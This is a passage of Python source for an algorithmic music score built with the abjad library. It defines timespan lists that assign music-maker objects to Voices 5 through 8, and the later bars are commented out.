        [(48, 8), (50, 8), soprano_three_musicmaker_two],
        [(50, 8), (52, 8), soprano_three_musicmaker_two],
        [(52, 8), (54, 8), soprano_three_musicmaker_two],
        [(54, 8), (56, 8), soprano_three_musicmaker_three],
        [(56, 8), (58, 8), soprano_three_musicmaker_two],
        [(58, 8), (60, 8), soprano_three_musicmaker_three],
        [(60, 8), (62, 8), soprano_three_musicmaker_three],
        [(62, 8), (64, 8), soprano_three_musicmaker_three],
        [(64, 8), (66, 8), soprano_three_musicmaker_three],
        [(66, 8), (68, 8), soprano_three_musicmaker_three],
        [(68, 8), (70, 8), soprano_three_musicmaker_two],
        [(70, 8), (72, 8), soprano_three_musicmaker_three],
        [(72, 8), (74, 8), soprano_three_musicmaker_two],
        [(74, 8), (76, 8), soprano_three_musicmaker_three],
        [(76, 8), (78, 8), soprano_three_musicmaker_two],
        [(78, 8), (80, 8), soprano_three_musicmaker_two],
        [(80, 8), (82, 8), soprano_three_musicmaker_two],
        [(82, 8), (84, 8), soprano_three_musicmaker_two],
        [(84, 8), (86, 8), soprano_three_musicmaker_three],
        [(86, 8), (88, 8), soprano_three_musicmaker_three],
        [(88, 8), (90, 8), soprano_three_musicmaker_three],
        [(90, 8), (92, 8), soprano_three_musicmaker_three],
        [(92, 8), (94, 8), soprano_three_musicmaker_three],
        [(94, 8), (96, 8), soprano_three_musicmaker_two],
        [(96, 8), (98, 8), soprano_three_musicmaker_three],
        [(98, 8), (100, 8), soprano_three_musicmaker_three],
        [(100, 8), (102, 8), soprano_three_musicmaker_two],
        [(102, 8), (104, 8), soprano_three_musicmaker_three],
        # Disabled continuation (104/8 .. 199/8) — see header note above.
        # [(104, 8), (106, 8), soprano_three_musicmaker_three],
        # [(106, 8), (108, 8), soprano_three_musicmaker_two],
        # [(108, 8), (110, 8), soprano_three_musicmaker_two],
        # [(110, 8), (112, 8), soprano_three_musicmaker_two],
        #
        # [(112, 8), (114, 8), soprano_three_musicmaker_two],
        # [(114, 8), (116, 8), soprano_three_musicmaker_three],
        # [(116, 8), (118, 8), soprano_three_musicmaker_three],
        # [(118, 8), (120, 8), soprano_three_musicmaker_three],
        #
        # [(120, 8), (122, 8), soprano_three_musicmaker_three],
        # [(122, 8), (124, 8), soprano_three_musicmaker_two],
        # [(124, 8), (126, 8), soprano_three_musicmaker_two],
        # [(126, 8), (128, 8), soprano_three_musicmaker_three],
        #
        # [(128, 8), (130, 8), soprano_three_musicmaker_two],
        # [(130, 8), (132, 8), soprano_three_musicmaker_two],
        # [(132, 8), (134, 8), soprano_three_musicmaker_three],
        # [(134, 8), (136, 8), soprano_three_musicmaker_two],
        # [(136, 8), (138, 8), soprano_three_musicmaker_two],
        # [(138, 8), (140, 8), soprano_three_musicmaker_two],
        # [(140, 8), (142, 8), soprano_three_musicmaker_three],
        # [(142, 8), (144, 8), soprano_three_musicmaker_three],
        #
        # [(144, 8), (146, 8), soprano_three_musicmaker_three],
        # [(146, 8), (148, 8), soprano_three_musicmaker_two],
        # [(148, 8), (150, 8), soprano_three_musicmaker_three],
        # [(150, 8), (152, 8), soprano_three_musicmaker_two],
        #
        # [(152, 8), (154, 8), soprano_three_musicmaker_three],
        # [(154, 8), (156, 8), soprano_three_musicmaker_three],
        # [(156, 8), (158, 8), soprano_three_musicmaker_two],
        # [(158, 8), (160, 8), soprano_three_musicmaker_two],
        #
        # [(160, 8), (162, 8), soprano_three_musicmaker_two],
        # [(162, 8), (164, 8), soprano_three_musicmaker_two],
        # [(164, 8), (166, 8), soprano_three_musicmaker_two],
        # [(166, 8), (168, 8), soprano_three_musicmaker_three],
        #
        # [(168, 8), (170, 8), soprano_three_musicmaker_two],
        # [(170, 8), (172, 8), soprano_three_musicmaker_three],
        # [(172, 8), (174, 8), soprano_three_musicmaker_three],
        # [(174, 8), (176, 8), soprano_three_musicmaker_two],
        #
        # [(176, 8), (178, 8), soprano_three_musicmaker_two],
        # [(178, 8), (180, 8), soprano_three_musicmaker_three],
        # [(180, 8), (182, 8), soprano_three_musicmaker_three],
        # [(182, 8), (184, 8), soprano_three_musicmaker_three],
        #
        # [(184, 8), (186, 8), soprano_three_musicmaker_two],
        # [(186, 8), (188, 8), soprano_three_musicmaker_two],
        # [(188, 8), (190, 8), soprano_three_musicmaker_three],
        # [(190, 8), (192, 8), soprano_three_musicmaker_two],
        #
        # [(192, 8), (194, 8), soprano_three_musicmaker_two],
        # [(194, 8), (196, 8), soprano_three_musicmaker_two],
        # [(196, 8), (198, 8), soprano_three_musicmaker_three],
        # [(198, 8), (199, 8), soprano_three_musicmaker_three],
    ]
])
# Timespans for Voice 5: two-bar (2/8-duration) spans from 0/8 through 104/8,
# each tagged with its music-maker. Entries from 104/8 to 199/8 are commented
# out — presumably the tail of the piece is disabled for now; TODO confirm
# before re-enabling. NOTE(review): Voice 5 <-> "alto one" pairing is inferred
# from variable names only — verify against the score setup.
voice_5_timespan_list: abjad.TimespanList = abjad.TimespanList([
    abjad.AnnotatedTimespan(
        start_offset=start_offset,
        stop_offset=stop_offset,
        annotation=MusicSpecifier(
            music_maker=music_maker,
            voice_name='Voice 5',
        ),
    )
    # Each entry: [start offset pair, stop offset pair, music-maker object].
    for start_offset, stop_offset, music_maker in [
        [(0, 8), (2, 8), alto_one_musicmaker_three],
        [(2, 8), (4, 8), alto_one_musicmaker_three],
        [(4, 8), (6, 8), alto_one_musicmaker_two],
        [(6, 8), (8, 8), alto_one_musicmaker_two],
        [(8, 8), (10, 8), alto_one_musicmaker_two],
        [(10, 8), (12, 8), alto_one_musicmaker_three],
        [(12, 8), (14, 8), alto_one_musicmaker_two],
        [(14, 8), (16, 8), alto_one_musicmaker_three],
        [(16, 8), (18, 8), alto_one_musicmaker_three],
        [(18, 8), (20, 8), alto_one_musicmaker_three],
        [(20, 8), (22, 8), alto_one_musicmaker_three],
        [(22, 8), (24, 8), alto_one_musicmaker_three],
        [(24, 8), (26, 8), alto_one_musicmaker_two],
        [(26, 8), (28, 8), alto_one_musicmaker_two],
        [(28, 8), (30, 8), alto_one_musicmaker_two],
        [(30, 8), (32, 8), alto_one_musicmaker_two],
        [(32, 8), (34, 8), alto_one_musicmaker_two],
        [(34, 8), (36, 8), alto_one_musicmaker_three],
        [(36, 8), (38, 8), alto_one_musicmaker_three],
        [(38, 8), (40, 8), alto_one_musicmaker_three],
        [(40, 8), (42, 8), alto_one_musicmaker_two],
        [(42, 8), (44, 8), alto_one_musicmaker_three],
        [(44, 8), (46, 8), alto_one_musicmaker_two],
        [(46, 8), (48, 8), alto_one_musicmaker_two],
        [(48, 8), (50, 8), alto_one_musicmaker_two],
        [(50, 8), (52, 8), alto_one_musicmaker_three],
        [(52, 8), (54, 8), alto_one_musicmaker_two],
        [(54, 8), (56, 8), alto_one_musicmaker_three],
        [(56, 8), (58, 8), alto_one_musicmaker_three],
        [(58, 8), (60, 8), alto_one_musicmaker_three],
        [(60, 8), (62, 8), alto_one_musicmaker_two],
        [(62, 8), (64, 8), alto_one_musicmaker_three],
        [(64, 8), (66, 8), alto_one_musicmaker_two],
        [(66, 8), (68, 8), alto_one_musicmaker_three],
        [(68, 8), (70, 8), alto_one_musicmaker_three],
        [(70, 8), (72, 8), alto_one_musicmaker_two],
        [(72, 8), (74, 8), alto_one_musicmaker_two],
        [(74, 8), (76, 8), alto_one_musicmaker_three],
        [(76, 8), (78, 8), alto_one_musicmaker_three],
        [(78, 8), (80, 8), alto_one_musicmaker_three],
        [(80, 8), (82, 8), alto_one_musicmaker_three],
        [(82, 8), (84, 8), alto_one_musicmaker_two],
        [(84, 8), (86, 8), alto_one_musicmaker_two],
        [(86, 8), (88, 8), alto_one_musicmaker_two],
        [(88, 8), (90, 8), alto_one_musicmaker_two],
        [(90, 8), (92, 8), alto_one_musicmaker_three],
        [(92, 8), (94, 8), alto_one_musicmaker_two],
        [(94, 8), (96, 8), alto_one_musicmaker_three],
        [(96, 8), (98, 8), alto_one_musicmaker_three],
        [(98, 8), (100, 8), alto_one_musicmaker_two],
        [(100, 8), (102, 8), alto_one_musicmaker_two],
        [(102, 8), (104, 8), alto_one_musicmaker_three],
        # Disabled continuation (104/8 .. 199/8) — see header note above.
        # [(104, 8), (106, 8), alto_one_musicmaker_three],
        # [(106, 8), (108, 8), alto_one_musicmaker_three],
        # [(108, 8), (110, 8), alto_one_musicmaker_two],
        # [(110, 8), (112, 8), alto_one_musicmaker_two],
        #
        # [(112, 8), (114, 8), alto_one_musicmaker_two],
        # [(114, 8), (116, 8), alto_one_musicmaker_two],
        # [(116, 8), (118, 8), alto_one_musicmaker_three],
        # [(118, 8), (120, 8), alto_one_musicmaker_three],
        #
        # [(120, 8), (122, 8), alto_one_musicmaker_three],
        # [(122, 8), (124, 8), alto_one_musicmaker_three],
        # [(124, 8), (126, 8), alto_one_musicmaker_two],
        # [(126, 8), (128, 8), alto_one_musicmaker_two],
        #
        # [(128, 8), (130, 8), alto_one_musicmaker_two],
        # [(130, 8), (132, 8), alto_one_musicmaker_two],
        # [(132, 8), (134, 8), alto_one_musicmaker_two],
        # [(134, 8), (136, 8), alto_one_musicmaker_three],
        # [(136, 8), (138, 8), alto_one_musicmaker_three],
        # [(138, 8), (140, 8), alto_one_musicmaker_three],
        # [(140, 8), (142, 8), alto_one_musicmaker_three],
        # [(142, 8), (144, 8), alto_one_musicmaker_three],
        # [(144, 8), (146, 8), alto_one_musicmaker_two],
        # [(146, 8), (148, 8), alto_one_musicmaker_two],
        # [(148, 8), (150, 8), alto_one_musicmaker_two],
        # [(150, 8), (152, 8), alto_one_musicmaker_two],
        #
        # [(152, 8), (154, 8), alto_one_musicmaker_two],
        # [(154, 8), (156, 8), alto_one_musicmaker_three],
        # [(156, 8), (158, 8), alto_one_musicmaker_three],
        # [(158, 8), (160, 8), alto_one_musicmaker_three],
        #
        # [(160, 8), (162, 8), alto_one_musicmaker_three],
        # [(162, 8), (164, 8), alto_one_musicmaker_three],
        # [(164, 8), (166, 8), alto_one_musicmaker_two],
        # [(166, 8), (168, 8), alto_one_musicmaker_two],
        #
        # [(168, 8), (170, 8), alto_one_musicmaker_two],
        # [(170, 8), (172, 8), alto_one_musicmaker_two],
        # [(172, 8), (174, 8), alto_one_musicmaker_two],
        # [(174, 8), (176, 8), alto_one_musicmaker_three],
        #
        # [(176, 8), (178, 8), alto_one_musicmaker_three],
        # [(178, 8), (180, 8), alto_one_musicmaker_three],
        # [(180, 8), (182, 8), alto_one_musicmaker_three],
        # [(182, 8), (184, 8), alto_one_musicmaker_three],
        #
        # [(184, 8), (186, 8), alto_one_musicmaker_two],
        # [(186, 8), (188, 8), alto_one_musicmaker_two],
        # [(188, 8), (190, 8), alto_one_musicmaker_two],
        # [(190, 8), (192, 8), alto_one_musicmaker_two],
        #
        # [(192, 8), (194, 8), alto_one_musicmaker_two],
        # [(194, 8), (196, 8), alto_one_musicmaker_three],
        # [(196, 8), (198, 8), alto_one_musicmaker_three],
        # [(198, 8), (199, 8), alto_one_musicmaker_three],
    ]
])
# Timespans for Voice 6: two-bar (2/8-duration) spans from 0/8 through 104/8,
# each tagged with its music-maker. Entries from 104/8 to 199/8 are commented
# out — presumably the tail of the piece is disabled for now; TODO confirm
# before re-enabling. NOTE(review): Voice 6 <-> "alto two" pairing is inferred
# from variable names only — verify against the score setup.
voice_6_timespan_list: abjad.TimespanList = abjad.TimespanList([
    abjad.AnnotatedTimespan(
        start_offset=start_offset,
        stop_offset=stop_offset,
        annotation=MusicSpecifier(
            music_maker=music_maker,
            voice_name='Voice 6',
        ),
    )
    # Each entry: [start offset pair, stop offset pair, music-maker object].
    for start_offset, stop_offset, music_maker in [
        [(0, 8), (2, 8), alto_two_musicmaker_three],
        [(2, 8), (4, 8), alto_two_musicmaker_three],
        [(4, 8), (6, 8), alto_two_musicmaker_three],
        [(6, 8), (8, 8), alto_two_musicmaker_three],
        [(8, 8), (10, 8), alto_two_musicmaker_two],
        [(10, 8), (12, 8), alto_two_musicmaker_two],
        [(12, 8), (14, 8), alto_two_musicmaker_two],
        [(14, 8), (16, 8), alto_two_musicmaker_two],
        [(16, 8), (18, 8), alto_two_musicmaker_two],
        [(18, 8), (20, 8), alto_two_musicmaker_three],
        [(20, 8), (22, 8), alto_two_musicmaker_three],
        [(22, 8), (24, 8), alto_two_musicmaker_three],
        [(24, 8), (26, 8), alto_two_musicmaker_two],
        [(26, 8), (28, 8), alto_two_musicmaker_three],
        [(28, 8), (30, 8), alto_two_musicmaker_three],
        [(30, 8), (32, 8), alto_two_musicmaker_two],
        [(32, 8), (34, 8), alto_two_musicmaker_two],
        [(34, 8), (36, 8), alto_two_musicmaker_two],
        [(36, 8), (38, 8), alto_two_musicmaker_two],
        [(38, 8), (40, 8), alto_two_musicmaker_three],
        [(40, 8), (42, 8), alto_two_musicmaker_three],
        [(42, 8), (44, 8), alto_two_musicmaker_three],
        [(44, 8), (46, 8), alto_two_musicmaker_two],
        [(46, 8), (48, 8), alto_two_musicmaker_two],
        [(48, 8), (50, 8), alto_two_musicmaker_three],
        [(50, 8), (52, 8), alto_two_musicmaker_two],
        [(52, 8), (54, 8), alto_two_musicmaker_three],
        [(54, 8), (56, 8), alto_two_musicmaker_two],
        [(56, 8), (58, 8), alto_two_musicmaker_two],
        [(58, 8), (60, 8), alto_two_musicmaker_three],
        [(60, 8), (62, 8), alto_two_musicmaker_three],
        [(62, 8), (64, 8), alto_two_musicmaker_two],
        [(64, 8), (66, 8), alto_two_musicmaker_two],
        [(66, 8), (68, 8), alto_two_musicmaker_two],
        [(68, 8), (70, 8), alto_two_musicmaker_three],
        [(70, 8), (72, 8), alto_two_musicmaker_three],
        [(72, 8), (74, 8), alto_two_musicmaker_three],
        [(74, 8), (76, 8), alto_two_musicmaker_two],
        [(76, 8), (78, 8), alto_two_musicmaker_two],
        [(78, 8), (80, 8), alto_two_musicmaker_two],
        [(80, 8), (82, 8), alto_two_musicmaker_two],
        [(82, 8), (84, 8), alto_two_musicmaker_three],
        [(84, 8), (86, 8), alto_two_musicmaker_three],
        [(86, 8), (88, 8), alto_two_musicmaker_three],
        [(88, 8), (90, 8), alto_two_musicmaker_three],
        [(90, 8), (92, 8), alto_two_musicmaker_two],
        [(92, 8), (94, 8), alto_two_musicmaker_two],
        [(94, 8), (96, 8), alto_two_musicmaker_three],
        [(96, 8), (98, 8), alto_two_musicmaker_two],
        [(98, 8), (100, 8), alto_two_musicmaker_two],
        [(100, 8), (102, 8), alto_two_musicmaker_three],
        [(102, 8), (104, 8), alto_two_musicmaker_two],
        # Disabled continuation (104/8 .. 199/8) — see header note above.
        # [(104, 8), (106, 8), alto_two_musicmaker_three],
        # [(106, 8), (108, 8), alto_two_musicmaker_two],
        # [(108, 8), (110, 8), alto_two_musicmaker_three],
        # [(110, 8), (112, 8), alto_two_musicmaker_two],
        #
        # [(112, 8), (114, 8), alto_two_musicmaker_two],
        # [(114, 8), (116, 8), alto_two_musicmaker_two],
        # [(116, 8), (118, 8), alto_two_musicmaker_three],
        # [(118, 8), (120, 8), alto_two_musicmaker_two],
        #
        # [(120, 8), (122, 8), alto_two_musicmaker_two],
        # [(122, 8), (124, 8), alto_two_musicmaker_three],
        # [(124, 8), (126, 8), alto_two_musicmaker_three],
        # [(126, 8), (128, 8), alto_two_musicmaker_three],
        #
        # [(128, 8), (130, 8), alto_two_musicmaker_two],
        # [(130, 8), (132, 8), alto_two_musicmaker_three],
        # [(132, 8), (134, 8), alto_two_musicmaker_three],
        # [(134, 8), (136, 8), alto_two_musicmaker_two],
        # [(136, 8), (138, 8), alto_two_musicmaker_two],
        # [(138, 8), (140, 8), alto_two_musicmaker_three],
        # [(140, 8), (142, 8), alto_two_musicmaker_two],
        # [(142, 8), (144, 8), alto_two_musicmaker_three],
        #
        # [(144, 8), (146, 8), alto_two_musicmaker_two],
        # [(146, 8), (148, 8), alto_two_musicmaker_two],
        # [(148, 8), (150, 8), alto_two_musicmaker_three],
        # [(150, 8), (152, 8), alto_two_musicmaker_three],
        #
        # [(152, 8), (154, 8), alto_two_musicmaker_two],
        # [(154, 8), (156, 8), alto_two_musicmaker_three],
        # [(156, 8), (158, 8), alto_two_musicmaker_two],
        # [(158, 8), (160, 8), alto_two_musicmaker_three],
        #
        # [(160, 8), (162, 8), alto_two_musicmaker_three],
        # [(162, 8), (164, 8), alto_two_musicmaker_two],
        # [(164, 8), (166, 8), alto_two_musicmaker_three],
        # [(166, 8), (168, 8), alto_two_musicmaker_two],
        #
        # [(168, 8), (170, 8), alto_two_musicmaker_two],
        # [(170, 8), (172, 8), alto_two_musicmaker_three],
        # [(172, 8), (174, 8), alto_two_musicmaker_two],
        # [(174, 8), (176, 8), alto_two_musicmaker_two],
        #
        # [(176, 8), (178, 8), alto_two_musicmaker_two],
        # [(178, 8), (180, 8), alto_two_musicmaker_three],
        # [(180, 8), (182, 8), alto_two_musicmaker_two],
        # [(182, 8), (184, 8), alto_two_musicmaker_three],
        #
        # [(184, 8), (186, 8), alto_two_musicmaker_three],
        # [(186, 8), (188, 8), alto_two_musicmaker_three],
        # [(188, 8), (190, 8), alto_two_musicmaker_two],
        # [(190, 8), (192, 8), alto_two_musicmaker_three],
        #
        # [(192, 8), (194, 8), alto_two_musicmaker_three],
        # [(194, 8), (196, 8), alto_two_musicmaker_two],
        # [(196, 8), (198, 8), alto_two_musicmaker_three],
        # [(198, 8), (199, 8), alto_two_musicmaker_two],
    ]
])
# Timespans for Voice 7: two-bar (2/8-duration) spans from 0/8 through 104/8,
# each tagged with its music-maker. Entries from 104/8 to 199/8 are commented
# out — presumably the tail of the piece is disabled for now; TODO confirm
# before re-enabling. NOTE(review): Voice 7 <-> "alto three" pairing is
# inferred from variable names only — verify against the score setup.
voice_7_timespan_list: abjad.TimespanList = abjad.TimespanList([
    abjad.AnnotatedTimespan(
        start_offset=start_offset,
        stop_offset=stop_offset,
        annotation=MusicSpecifier(
            music_maker=music_maker,
            voice_name='Voice 7',
        ),
    )
    # Each entry: [start offset pair, stop offset pair, music-maker object].
    for start_offset, stop_offset, music_maker in [
        [(0, 8), (2, 8), alto_three_musicmaker_two],
        [(2, 8), (4, 8), alto_three_musicmaker_two],
        [(4, 8), (6, 8), alto_three_musicmaker_three],
        [(6, 8), (8, 8), alto_three_musicmaker_two],
        [(8, 8), (10, 8), alto_three_musicmaker_two],
        [(10, 8), (12, 8), alto_three_musicmaker_three],
        [(12, 8), (14, 8), alto_three_musicmaker_two],
        [(14, 8), (16, 8), alto_three_musicmaker_three],
        [(16, 8), (18, 8), alto_three_musicmaker_three],
        [(18, 8), (20, 8), alto_three_musicmaker_three],
        [(20, 8), (22, 8), alto_three_musicmaker_two],
        [(22, 8), (24, 8), alto_three_musicmaker_two],
        [(24, 8), (26, 8), alto_three_musicmaker_two],
        [(26, 8), (28, 8), alto_three_musicmaker_three],
        [(28, 8), (30, 8), alto_three_musicmaker_two],
        [(30, 8), (32, 8), alto_three_musicmaker_three],
        [(32, 8), (34, 8), alto_three_musicmaker_three],
        [(34, 8), (36, 8), alto_three_musicmaker_three],
        [(36, 8), (38, 8), alto_three_musicmaker_two],
        [(38, 8), (40, 8), alto_three_musicmaker_three],
        [(40, 8), (42, 8), alto_three_musicmaker_three],
        [(42, 8), (44, 8), alto_three_musicmaker_two],
        [(44, 8), (46, 8), alto_three_musicmaker_three],
        [(46, 8), (48, 8), alto_three_musicmaker_three],
        [(48, 8), (50, 8), alto_three_musicmaker_three],
        [(50, 8), (52, 8), alto_three_musicmaker_two],
        [(52, 8), (54, 8), alto_three_musicmaker_three],
        [(54, 8), (56, 8), alto_three_musicmaker_two],
        [(56, 8), (58, 8), alto_three_musicmaker_two],
        [(58, 8), (60, 8), alto_three_musicmaker_three],
        [(60, 8), (62, 8), alto_three_musicmaker_three],
        [(62, 8), (64, 8), alto_three_musicmaker_three],
        [(64, 8), (66, 8), alto_three_musicmaker_two],
        [(66, 8), (68, 8), alto_three_musicmaker_two],
        [(68, 8), (70, 8), alto_three_musicmaker_two],
        [(70, 8), (72, 8), alto_three_musicmaker_two],
        [(72, 8), (74, 8), alto_three_musicmaker_two],
        [(74, 8), (76, 8), alto_three_musicmaker_three],
        [(76, 8), (78, 8), alto_three_musicmaker_three],
        [(78, 8), (80, 8), alto_three_musicmaker_three],
        [(80, 8), (82, 8), alto_three_musicmaker_three],
        [(82, 8), (84, 8), alto_three_musicmaker_two],
        [(84, 8), (86, 8), alto_three_musicmaker_three],
        [(86, 8), (88, 8), alto_three_musicmaker_two],
        [(88, 8), (90, 8), alto_three_musicmaker_two],
        [(90, 8), (92, 8), alto_three_musicmaker_two],
        [(92, 8), (94, 8), alto_three_musicmaker_three],
        [(94, 8), (96, 8), alto_three_musicmaker_two],
        [(96, 8), (98, 8), alto_three_musicmaker_two],
        [(98, 8), (100, 8), alto_three_musicmaker_three],
        [(100, 8), (102, 8), alto_three_musicmaker_three],
        [(102, 8), (104, 8), alto_three_musicmaker_three],
        # Disabled continuation (104/8 .. 199/8) — see header note above.
        # [(104, 8), (106, 8), alto_three_musicmaker_two],
        # [(106, 8), (108, 8), alto_three_musicmaker_three],
        # [(108, 8), (110, 8), alto_three_musicmaker_two],
        # [(110, 8), (112, 8), alto_three_musicmaker_two],
        #
        # [(112, 8), (114, 8), alto_three_musicmaker_three],
        # [(114, 8), (116, 8), alto_three_musicmaker_three],
        # [(116, 8), (118, 8), alto_three_musicmaker_three],
        # [(118, 8), (120, 8), alto_three_musicmaker_two],
        #
        # [(120, 8), (122, 8), alto_three_musicmaker_three],
        # [(122, 8), (124, 8), alto_three_musicmaker_two],
        # [(124, 8), (126, 8), alto_three_musicmaker_two],
        # [(126, 8), (128, 8), alto_three_musicmaker_three],
        #
        # [(128, 8), (130, 8), alto_three_musicmaker_three],
        # [(130, 8), (132, 8), alto_three_musicmaker_two],
        # [(132, 8), (134, 8), alto_three_musicmaker_two],
        # [(134, 8), (136, 8), alto_three_musicmaker_three],
        # [(136, 8), (138, 8), alto_three_musicmaker_two],
        # [(138, 8), (140, 8), alto_three_musicmaker_three],
        # [(140, 8), (142, 8), alto_three_musicmaker_three],
        # [(142, 8), (144, 8), alto_three_musicmaker_three],
        # [(144, 8), (146, 8), alto_three_musicmaker_three],
        # [(146, 8), (148, 8), alto_three_musicmaker_two],
        # [(148, 8), (150, 8), alto_three_musicmaker_two],
        # [(150, 8), (152, 8), alto_three_musicmaker_two],
        #
        # [(152, 8), (154, 8), alto_three_musicmaker_two],
        # [(154, 8), (156, 8), alto_three_musicmaker_three],
        # [(156, 8), (158, 8), alto_three_musicmaker_two],
        # [(158, 8), (160, 8), alto_three_musicmaker_three],
        #
        # [(160, 8), (162, 8), alto_three_musicmaker_three],
        # [(162, 8), (164, 8), alto_three_musicmaker_three],
        # [(164, 8), (166, 8), alto_three_musicmaker_two],
        # [(166, 8), (168, 8), alto_three_musicmaker_three],
        #
        # [(168, 8), (170, 8), alto_three_musicmaker_three],
        # [(170, 8), (172, 8), alto_three_musicmaker_two],
        # [(172, 8), (174, 8), alto_three_musicmaker_three],
        # [(174, 8), (176, 8), alto_three_musicmaker_two],
        #
        # [(176, 8), (178, 8), alto_three_musicmaker_two],
        # [(178, 8), (180, 8), alto_three_musicmaker_two],
        # [(180, 8), (182, 8), alto_three_musicmaker_three],
        # [(182, 8), (184, 8), alto_three_musicmaker_three],
        #
        # [(184, 8), (186, 8), alto_three_musicmaker_three],
        # [(186, 8), (188, 8), alto_three_musicmaker_two],
        # [(188, 8), (190, 8), alto_three_musicmaker_three],
        # [(190, 8), (192, 8), alto_three_musicmaker_two],
        #
        # [(192, 8), (194, 8), alto_three_musicmaker_two],
        # [(194, 8), (196, 8), alto_three_musicmaker_two],
        # [(196, 8), (198, 8), alto_three_musicmaker_two],
        # [(198, 8), (199, 8), alto_three_musicmaker_three],
    ]
])
# Timespans for Voice 8: two-bar (2/8-duration) spans from 0/8 through 104/8,
# each tagged with its music-maker. Entries from 104/8 to 199/8 are commented
# out — presumably the tail of the piece is disabled for now; TODO confirm
# before re-enabling. NOTE(review): Voice 8 <-> "alto four" pairing is
# inferred from variable names only — verify against the score setup.
voice_8_timespan_list: abjad.TimespanList = abjad.TimespanList([
    abjad.AnnotatedTimespan(
        start_offset=start_offset,
        stop_offset=stop_offset,
        annotation=MusicSpecifier(
            music_maker=music_maker,
            voice_name='Voice 8',
        ),
    )
    # Each entry: [start offset pair, stop offset pair, music-maker object].
    for start_offset, stop_offset, music_maker in [
        [(0, 8), (2, 8), alto_four_musicmaker_two],
        [(2, 8), (4, 8), alto_four_musicmaker_two],
        [(4, 8), (6, 8), alto_four_musicmaker_two],
        [(6, 8), (8, 8), alto_four_musicmaker_three],
        [(8, 8), (10, 8), alto_four_musicmaker_three],
        [(10, 8), (12, 8), alto_four_musicmaker_three],
        [(12, 8), (14, 8), alto_four_musicmaker_two],
        [(14, 8), (16, 8), alto_four_musicmaker_two],
        [(16, 8), (18, 8), alto_four_musicmaker_two],
        [(18, 8), (20, 8), alto_four_musicmaker_three],
        [(20, 8), (22, 8), alto_four_musicmaker_three],
        [(22, 8), (24, 8), alto_four_musicmaker_three],
        [(24, 8), (26, 8), alto_four_musicmaker_three],
        [(26, 8), (28, 8), alto_four_musicmaker_two],
        [(28, 8), (30, 8), alto_four_musicmaker_two],
        [(30, 8), (32, 8), alto_four_musicmaker_two],
        [(32, 8), (34, 8), alto_four_musicmaker_two],
        [(34, 8), (36, 8), alto_four_musicmaker_three],
        [(36, 8), (38, 8), alto_four_musicmaker_three],
        [(38, 8), (40, 8), alto_four_musicmaker_three],
        [(40, 8), (42, 8), alto_four_musicmaker_three],
        [(42, 8), (44, 8), alto_four_musicmaker_three],
        [(44, 8), (46, 8), alto_four_musicmaker_two],
        [(46, 8), (48, 8), alto_four_musicmaker_two],
        [(48, 8), (50, 8), alto_four_musicmaker_two],
        [(50, 8), (52, 8), alto_four_musicmaker_two],
        [(52, 8), (54, 8), alto_four_musicmaker_three],
        [(54, 8), (56, 8), alto_four_musicmaker_three],
        [(56, 8), (58, 8), alto_four_musicmaker_three],
        [(58, 8), (60, 8), alto_four_musicmaker_two],
        [(60, 8), (62, 8), alto_four_musicmaker_three],
        [(62, 8), (64, 8), alto_four_musicmaker_two],
        [(64, 8), (66, 8), alto_four_musicmaker_three],
        [(66, 8), (68, 8), alto_four_musicmaker_two],
        [(68, 8), (70, 8), alto_four_musicmaker_three],
        [(70, 8), (72, 8), alto_four_musicmaker_two],
        [(72, 8), (74, 8), alto_four_musicmaker_two],
        [(74, 8), (76, 8), alto_four_musicmaker_two],
        [(76, 8), (78, 8), alto_four_musicmaker_three],
        [(78, 8), (80, 8), alto_four_musicmaker_three],
        [(80, 8), (82, 8), alto_four_musicmaker_three],
        [(82, 8), (84, 8), alto_four_musicmaker_two],
        [(84, 8), (86, 8), alto_four_musicmaker_three],
        [(86, 8), (88, 8), alto_four_musicmaker_two],
        [(88, 8), (90, 8), alto_four_musicmaker_three],
        [(90, 8), (92, 8), alto_four_musicmaker_three],
        [(92, 8), (94, 8), alto_four_musicmaker_two],
        [(94, 8), (96, 8), alto_four_musicmaker_two],
        [(96, 8), (98, 8), alto_four_musicmaker_two],
        [(98, 8), (100, 8), alto_four_musicmaker_two],
        [(100, 8), (102, 8), alto_four_musicmaker_two],
        [(102, 8), (104, 8), alto_four_musicmaker_three],
        # Disabled continuation (104/8 .. 199/8) — see header note above.
        # [(104, 8), (106, 8), alto_four_musicmaker_two],
        # [(106, 8), (108, 8), alto_four_musicmaker_three],
        # [(108, 8), (110, 8), alto_four_musicmaker_two],
        # [(110, 8), (112, 8), alto_four_musicmaker_three],
        #
        # [(112, 8), (114, 8), alto_four_musicmaker_three],
        # [(114, 8), (116, 8), alto_four_musicmaker_three],
        # [(116, 8), (118, 8), alto_four_musicmaker_two],
        # [(118, 8), (120, 8), alto_four_musicmaker_three],
        #
        # [(120, 8), (122, 8), alto_four_musicmaker_three],
        # [(122, 8), (124, 8), alto_four_musicmaker_two],
        # [(124, 8), (126, 8), alto_four_musicmaker_three],
        # [(126, 8), (128, 8), alto_four_musicmaker_two],
        #
        # [(128, 8), (130, 8), alto_four_musicmaker_two],
        # [(130, 8), (132, 8), alto_four_musicmaker_two],
        # [(132, 8), (134, 8), alto_four_musicmaker_three],
        # [(134, 8), (136, 8), alto_four_musicmaker_two],
        # [(136, 8), (138, 8), alto_four_musicmaker_three],
        # [(138, 8), (140, 8), alto_four_musicmaker_three],
        # [(140, 8), (142, 8), alto_four_musicmaker_three],
        # [(142, 8), (144, 8), alto_four_musicmaker_two],
        # [(144, 8), (146, 8), alto_four_musicmaker_three],
        # [(146, 8), (148, 8), alto_four_musicmaker_three],
        # [(148, 8), (150, 8), alto_four_musicmaker_two],
        # [(150, 8), (152, 8), alto_four_musicmaker_two],
        #
        # [(152, 8), (154, 8), alto_four_musicmaker_two],
        # [(154, 8), (156, 8), alto_four_musicmaker_two],
        # [(156, 8), (158, 8), alto_four_musicmaker_two],
        # [(158, 8), (160, 8), alto_four_musicmaker_three],
        #
        # [(160, 8), (162, 8), alto_four_musicmaker_three],
        # [(162, 8), (164, 8), alto_four_musicmaker_two],
        # [(164, 8), (166, 8), alto_four_musicmaker_three],
        # [(166, 8), (168, 8), alto_four_musicmaker_two],
        #
        # [(168, 8), (170, 8), alto_four_musicmaker_two],
        # [(170, 8), (172, 8), alto_four_musicmaker_two],
        # [(172, 8), (174, 8), alto_four_musicmaker_three],
        # [(174, 8), (176, 8), alto_four_musicmaker_three],
        #
        # [(176, 8), (178, 8), alto_four_musicmaker_two],
        # [(178, 8), (180, 8), alto_four_musicmaker_three],
        # [(180, 8), (182, 8), alto_four_musicmaker_three],
        # [(182, 8), (184, 8), alto_four_musicmaker_two],
        #
